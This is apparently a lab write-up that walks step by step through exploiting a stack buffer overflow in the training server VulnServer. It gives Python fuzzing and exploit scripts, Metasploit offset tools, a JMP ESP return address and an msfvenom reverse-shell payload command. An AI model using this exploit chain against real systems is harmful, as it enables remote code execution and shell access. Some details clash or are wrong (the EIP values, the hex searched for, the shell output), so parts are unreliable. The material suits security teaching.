- Prerequisites
- Spiking
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding bad characters
- Finding the right module
- Generating shellcode
First, connect to VulnServer using netcat - nc -nv 192.168.0.105 9999 . Type HELP to review available commands to the server. Using generic_send_tcp to send our payload. Prepare two .spk files. One for spiking the STATS command, and one for the TRUN command.
s_readline();
s_string("STATS ");
s_string_variable("0");
s_readline();
s_string("TRUN ");
s_string_variable("0");
generic_send_tcp 192.168.0.105 9999 stats.spk 0 0
generic_send_tcp 192.168.0.105 9999 trun.spk 0 0#!/usr/bin/python
import sys, socket
from time import sleep
buffer = 'A' * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.105','9999'))
s.send(('TRUN /.:/' + buffer))
s.close()
sleep(1)
buffer = buffer + 'A' * 100
except:
print "Fuzzing crashed at %s bytes." % str(len(buffer))
sys.exit()By executing this script we see that the server crashes at 2700 ‘A’ characters.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000This metasploit script, creates a pattern of 3000 characters, that are used to detect the offset. To run this pattern we need to modify our previous script.
#!/usr/bin/python
import sys, socket
offset = 'insert pattern here'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.105','9999'))
s.send(('TRUN /.:/' + offset))
s.close()
except:
print "Error connecting to server"
sys.exit()On Immunity we see that the EIP module displays “386F4377”. Using another tool from metasploit’s scripts, we can get the exact offset providing the result from EIP.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337This results in “Exact match at offset 2003”.
Again, we modify our python script. This time using the exact offset we found.
#!/usr/bin/python
import sys, socket
shellcode = 'A' * 2003 + 'B' * 4
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.105','9999'))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print "Error connecting to server"
sys.exit()Knowing the HEX code of the characters ‘A’ and ‘B’, being 41 and 42, respectively, we can check if the EIP is being overwritten correctly.
After executing the script, the EIP module is correctly overwritten with our four ‘B’ characters, resulting in “42424242”.
We modify out script again by appending all potential bad characters to our shellcode. Then we look at the hexdump section in Immunity.
Any sequential disruption is a sign of a bad character.
Byimporting the [mona.py](http://mona.py) script into Immunity’s PyCommands folder, we can search for vulnerable dll’s by typinging !mona module in the bottom left corner. The module has no memory protection if it has false on all (Rebase, SafeSEH, ASLR, NXCompat and OS DLL). On Kali, there is a tool called nasm_shell that transforms assembly commands into hex code. Using nasm we can generate the hex equivalent to JMP ESP which is FFE4. Again in Immunity, we type mona find -s “\xff\xf4” -m essfunc.dll. After we’ve run the command, we copy the return address of our module - 625011af and use it to modify our script again.
#!/usr/bin/python
import sys, socket
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.105','9999'))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print "Error connecting to server"
sys.exit()Before running the script, make sure you add the expression 625011af for Immunity to follow. Now we can see that the jump command has been successful inside the EIP!
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=9999 EXITFUNC=thread -f c -a x86 -b "\x00"#!/usr/bin/python
import sys, socket
overflow = "Insert generated payload here."
spaces = "\x90" * 32
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62' + spaces + overflow
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.105','9999'))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print "Error connecting to server"
sys.exit()whoami
root